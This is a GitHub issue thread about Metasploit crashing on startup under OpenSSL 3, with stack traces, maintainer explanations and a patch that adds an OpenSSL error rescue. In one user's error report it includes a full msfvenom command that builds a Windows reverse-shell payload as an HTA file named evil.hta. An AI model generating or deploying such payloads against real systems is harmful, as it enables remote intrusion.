`initialize': unsupported (OpenSSL::Cipher::CipherError)

[zontak]

Steps to reproduce

After running 'msfconsole' command an error appears on the console.

Were you following a specific guide/tutorial or reading documentation?

https://www.darkoperator.com/installing-metasploit-in-ubunt

Expected behavior

To start metasploit without any problems.

Current behavior

An error appears on the console:

/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `initialize': unsupported (OpenSSL::Cipher::CipherError)
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `new'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `included'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:14:in `include'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:14:in `<class:BlowfishCbc>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:9:in `<class:EncryptionAlgorithm>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:8:in `<class:Transport>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:7:in `<module:HrrRbSsh>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:6:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm.rb:19:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/iv_computable.rb:5:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/diffie_hellman.rb:7:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/diffie_hellman_group1_sha1.rb:4:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm.rb:17:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport.rb:15:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh.rb:15:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/rex/proto/ssh/hrr_rb_ssh.rb:3:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/rex/proto/ssh/connection.rb:2:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:146:in `default_version_string'
    from /opt/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:40:in `initialize'
    from /opt/metasploit-framework/lib/msf/base/sessions/command_shell_options.rb:16:in `initialize'
    from /opt/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_ssh.rb:16:in `initialize'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:95:in `new'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:95:in `block (2 levels) in recalculate'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:93:in `each_pair'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:93:in `block in recalculate'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:73:in `each_pair'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:73:in `recalculate'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:258:in `block in load_modules'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `each'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:170:in `block in load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `each'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:51:in `block in init_module_paths'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `each'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `init_module_paths'
    from /opt/metasploit-framework/lib/msf/ui/console/driver.rb:160:in `initialize'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:60:in `new'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:60:in `driver'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
    from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
    from /usr/local/bin/msfconsole:23:in `<main>'

Metasploit version

6.2.7-dev-

Additional Information

I Cannot run msfconsole to activate this loglevel 3 :(

[h00die]

I have experienced this as well. The termux forums has a patch you can apply to fix it, but an official answer or fix would be good

[adfoster-r7]

What ubuntu version + Ruby version is this triggering with? 👀

[h00die]

Ubuntu 22 for me, whatever the stock ruby from apt was

[adfoster-r7]

I believe the legacy bf-cbc cipher has been marked as deprecated in OpenSSL 3 and is now no longer loaded by default: https://www.openssl.org/docs/man3.0/man7/OSSL_PROVIDER-legacy.html which causes the ssh gem that Metasploit uses to die.

It doesn't look like there's a way to configure the provider via Ruby currently https://github.com/ruby/openssl/issues/500

I've cross-posted an issue over in hrr_rb_ssh https://github.com/hirura/hrr_rb_ssh/issues/32 for visibility to the gem author too

---

Workarounds

1) Temporarily rename the ssh module so it doesn't crash on start up:

mv ./modules/payloads/singles/cmd/unix/reverse_ssh.rb ./modules/payloads/singles/cmd/unix/reverse_ssh_soft_deletion

There might be other openssl issues in modules, I haven't sanity tested other modules yet.

2) Or - the nightly installers work which comes bundled with an older openssl version: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

[jmartin-tech]

Short term also consider utilizing RVM or some other Ruby environment manager to build Ruby against the older OpenSSL versions for the time being. The shift to OpenSSL3 while still supporting older ciphers is going to take some time.

[shadergz]

I had the same issue too! I can't create nothing with MSFvenom! Using: Framework Version: 6.2.6-dev

[adfoster-r7]

The crash should be fixed in this week's 6.2.8 release. If you are on Kali, this version is not yet available and you'll have to apply a work around for now.

Workarounds

Ubuntu (Anything other than Kali)

• Install the latest Metasploit-framework release which comes bundled with an older openssl version: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

Kali

Apply this patch locally to /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb

diff --git a/lib/msf/core/handler/reverse_ssh.rb b/lib/msf/core/handler/reverse_ssh.rb
index 9917ad4460..cf2b1bc472 100644
--- a/lib/msf/core/handler/reverse_ssh.rb
+++ b/lib/msf/core/handler/reverse_ssh.rb
@@ -145,8 +145,12 @@ module Msf
       def default_version_string
         require 'rex/proto/ssh/connection'
         Rex::Proto::Ssh::Connection.default_options['local_version']
+      rescue OpenSSL::OpenSSLError => e
+        print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}")
+        elog(e)
+        'SSH-2.0-OpenSSH_5.3p1'
       rescue LoadError => e
        print_error("This handler requires PTY access not available on all platforms.")
         elog(e)
         'SSH-2.0-OpenSSH_5.3p1'
       end

---

I'll keep this ticket open for now, as there's now going to be warnings generated instead of crashing - which can be ignored:

There will be warnings generated instead of crashing - which can be ignored:

$ bundle exec ruby ./msfconsole
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: previous definition of NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::PREFERENCE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: previous definition of PREFERENCE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::CIPHER_NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: previous definition of CIPHER_NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::BLOCK_SIZE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: previous definition of BLOCK_SIZE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: previous definition of NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::PREFERENCE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: previous definition of PREFERENCE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::CIPHER_NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: previous definition of CIPHER_NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::BLOCK_SIZE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: previous definition of BLOCK_SIZE was here

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .

       =[ metasploit v6.2.7-dev-f18392adb1                ]
+ -- --=[ 2228 exploits - 1175 auxiliary - 398 post       ]
+ -- --=[ 864 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can pivot connections over sessions 
started with the ssh_login modules

msf6 >

[ksaadDE]

someone put a report on kali bugtracker^^ https://bugs.kali.org/view.php?id=7804

[smortex]

Some issues in the repo are closed and link to the above workaround for Kali Linux (i.e. #16782, #16783, #16780) but the exception we got there is not the same as the one in this issue. The workaround needs to be adjusted accordingly in /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb (rescue OpenSSL::PKey::PKeyError instead of OpenSSL::Cipher::CipherError):

diff --git a/lib/msf/core/handler/reverse_ssh.rb b/lib/msf/core/handler/reverse_ssh.rb
index 9917ad4460..cf2b1bc472 100644
--- a/lib/msf/core/handler/reverse_ssh.rb
+++ b/lib/msf/core/handler/reverse_ssh.rb
@@ -145,8 +145,12 @@ module Msf
       def default_version_string
         require 'rex/proto/ssh/connection'
         Rex::Proto::Ssh::Connection.default_options['local_version']
+      rescue OpenSSL::PKey::PKeyError => e
+        print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}")
+        elog(e)
+        'SSH-2.0-OpenSSH_5.3p1'
       rescue LoadError => e
        print_error("This handler requires PTY access not available on all platforms.")
         elog(e)
         'SSH-2.0-OpenSSH_5.3p1'
       end

[adfoster-r7]

Thanks for the update @smortex - I've updated the original workaround to catch the base class OpenSSL::OpenSSLError for now, and we'll aim to get a fix into metasploit itself as well :+1:

[nandy6666]

Still receiving some warnings when launching msfconsole, even after updating the lines of code in reverse_ssh.rb file

/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here

[bcoles]

Still receiving some warnings when launching msfconsole, even after updating the lines of code in reverse_ssh.rb file

Correct. There will be warnings generated instead of crashing - which can be ignored.

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

[Manangoel98]

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

this comment is followed but still getting an error on running: bundle exec ruby ./msfvenom

[ghost]

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510 Hi new to this. How do I manually apply the kali linux patch? Or more specifically, how do I make a custom patch, and apply accordingly? tq

[bcoles]

#16767 (comment) Hi new to this. How do I manually apply the kali linux patch? Or more specifically, how do I make a custom patch, and apply accordingly? tq

The patch is in diff format.

Modify /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb.

Red lines are bad. Green lines are good. - means bad. + means good. Remove the bad lines. Add the good lines. This diff has no bad lines. Add the good lines.

Note that the above diff may be insufficient as per #16792.

Or alternatively, wait until an updated version of Metasploit is released with the patch applied.

[bcoles]

#16767 (comment)

this comment is followed but still getting an error on running: bundle exec ruby ./msfvenom

The above patch may be insufficient as per #16792, but it is impossible to say without knowing what error message you are getting.

[Manangoel98]

New Added Lines: got code from Github report of Metasploit Framework

rescue OpenSSL::Cipher::CipherError => e print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}") elog(e) 'SSH-2.0-OpenSSH_5.3p1'

ERROR:

`└─$ bundle exec ruby ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.188.10 LPORT=443 -f hta-psh -o evil.hta

/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:14:in generate_key!': pkeys are immutable on OpenSSL 3.0 (OpenSSL::PKey::PKeyError) from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:14:in' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:10:in <class:ServerHostKeyAlgorithm>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:9:in' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:8:in <module:HrrRbSsh>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:7:in<top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm.rb:19:in <top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport.rb:16:in<top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh.rb:15:in <top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/lib/rex/proto/ssh/hrr_rb_ssh.rb:3:in<top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/lib/rex/proto/ssh/connection.rb:2:in <top (required)>' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:inrequire' from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in require' from /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:146:indefault_version_string' from /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:40:in initialize' from /usr/share/metasploit-framework/lib/msf/base/sessions/command_shell_options.rb:16:ininitialize' from /usr/share/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_ssh.rb:16:in initialize' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:95:innew' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:95:in block (2 levels) in recalculate' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:93:ineach_pair' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:93:in block in recalculate' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:73:ineach_pair' from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:73:in recalculate' from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:258:inblock in load_modules' from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in each' from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:inload_modules' from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:170:in block in load_modules' from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:ineach' from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in load_modules' from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:inblock in add_module_path' from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in each' from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:inadd_module_path' from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:51:in block in init_module_paths' from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:ineach' from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in init_module_paths' from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:124:insimplify' from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:72:in create' from ./msfvenom:54:ininit_framework' from ./msfvenom:67:in framework' from ./msfvenom:472:in

' `

[bcoles]

OpenSSL::PKey::PKeyError should be caught by:

      rescue OpenSSL::OpenSSLError => e

As per:

https://github.com/rapid7/metasploit-framework/pull/16792/files

[Manangoel98]

SO now what should i do as I am preparing for exam

[bcoles]

SO now what should i do as I am preparing for exam

Instead of rescue OpenSSL::Cipher::CipherError => e use rescue OpenSSL::OpenSSLError => e.

[Manangoel98]

Thanks, Its working fine, just getting warnings :)

[munmun8]

hi,

i applied the workaround on kali, msfconsole able to load successfully.

but got this digest error when running some scan

[Sad-theFaceless]

The error is solved. Update your package metasploit-framework and it should work again without workaround.

[adfoster-r7]

@munmun8 Unfortunately it looks like some of the SMB modules, and a few other modules will be broken with OpenSSL 3. I'm investigating that more currently. The easiest solution at this point may be to downgrade the Kali OpenSSL version to 1.1.1

[ksaadDE]

@adfoster-r7 but got this digest error when running some scan @munmun8 Unfortunately it looks like some of the SMB modules, and a few other modules will be broken with OpenSSL 3. I'm investigating that more currently. The easiest solution at this point may be to downgrade the Kali OpenSSL version to 1.1.1

I would say.: please open a new issue and reference in the context to this

[adfoster-r7]

Closing this issue now that msfconsole no longer crashes on bootup in later versions.

Is your Kali crashing?

If your msfconsole is crashing on bootup due to OpenSSL3 - follow this fix: https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

Are some modules no longer working?

Some modules now fail with cryptic errors such as SMB Login which gives the error OpenSSL::Digest::DigestError Digest initialization failed: initialization error. We're now tracking that work on a separate issue over here: https://github.com/rapid7/metasploit-framework/issues/16818

Feel free to vote on that issue or leave a comment on which module is now failing so we can verify it will be fixed